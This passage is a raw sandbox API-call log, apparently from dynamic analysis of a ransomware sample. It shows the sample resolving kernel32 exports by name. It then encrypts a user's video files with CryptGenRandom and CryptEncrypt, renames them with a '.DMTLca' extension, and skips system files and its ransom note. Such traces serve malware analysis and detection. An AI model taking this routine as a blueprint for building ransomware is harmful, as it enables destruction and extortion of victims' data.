lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.740] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.740] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.740] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.740] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.740] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.741] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.741] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.741] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.741] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.741] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.741] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.741] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.741] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.741] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.741] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.741] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.741] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.741] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.741] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.741] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.741] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.741] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.741] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.741] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.742] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.742] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.742] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.742] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.742] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.742] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.742] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.742] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.742] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.742] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.742] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.742] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.742] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.742] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.742] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.742] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.742] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.742] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.742] lstrlenA (lpString="DELETEATOM") returned 10 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.743] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.743] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.743] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.743] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.743] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.743] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.743] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.743] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.743] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.743] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.743] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.743] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.743] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.743] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.743] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.743] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.743] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.743] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.744] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.744] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.744] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.744] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.744] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.744] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.744] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.744] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.744] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.744] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.744] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.744] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.744] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.744] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.744] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.744] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.744] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.744] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.744] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.745] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.745] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.745] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.745] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv") returned 78 [0087.745] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv.DMTLca") returned 85 [0087.745] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\_vyz 3tjcof gw2pru4f.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv.DMTLca" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\_vyz 3tjcof gw2pru4f.mkv.dmtlca"), dwFlags=0x0) returned 1 [0087.747] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.747] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.747] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.747] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc38b05f0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0x754d4670, ftLastAccessTime.dwHighDateTime=0x1d4c98c, ftLastWriteTime.dwLowDateTime=0x754d4670, ftLastWriteTime.dwHighDateTime=0x1d4c98c, nFileSizeHigh=0x0, nFileSizeLow=0xa1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="_vYz 3tjCOF gW2pru4f.mkv", cAlternateFileName="_VYZ3T~1.MKV")) returned 0 [0087.747] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0087.747] CloseHandle (hObject=0x410) returned 1 [0087.748] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1910e90, ftCreationTime.dwHighDateTime=0x1d4d0a0, ftLastAccessTime.dwLowDateTime=0x923a7ed0, ftLastAccessTime.dwHighDateTime=0x1d4ced5, ftLastWriteTime.dwLowDateTime=0x923a7ed0, ftLastWriteTime.dwHighDateTime=0x1d4ced5, nFileSizeHigh=0x0, nFileSizeLow=0xa1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QxFS.mp4", cAlternateFileName="")) returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="autorun.inf") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="boot.ini") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="desktop.ini") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="ntuser.dat") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="iconcache.db") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="bootsect.bak") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="ntuser.dat.log") returned 1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="thumbs.db") returned -1 [0087.748] lstrcmpiW (lpString1="QxFS.mp4", lpString2="Bootfont.bin") returned 1 [0087.748] lstrlenW (lpString="QxFS.mp4") returned 8 [0087.748] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0087.748] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0087.748] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0087.748] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0087.748] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.748] lstrlenW (lpString="QxFS.mp4") returned 8 [0087.748] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.748] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="QxFS.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4" [0087.748] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qxfs.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.749] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=2590) returned 1 [0087.749] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.749] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.749] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.749] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.749] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.750] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.750] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.750] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.751] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.751] CloseHandle (hObject=0x414) returned 1 [0087.751] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.751] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.752] CloseHandle (hObject=0x0) returned 0 [0087.752] CloseHandle (hObject=0x410) returned 1 [0087.752] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.752] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.752] GetTickCount () returned 0x114e61b [0087.752] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.753] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.753] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.753] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.753] lstrlenA (lpString="kernel32.dll") returned 12 [0087.753] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.754] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.754] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.754] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.754] lstrlenA (lpString="ADDATOMA") returned 8 [0087.754] 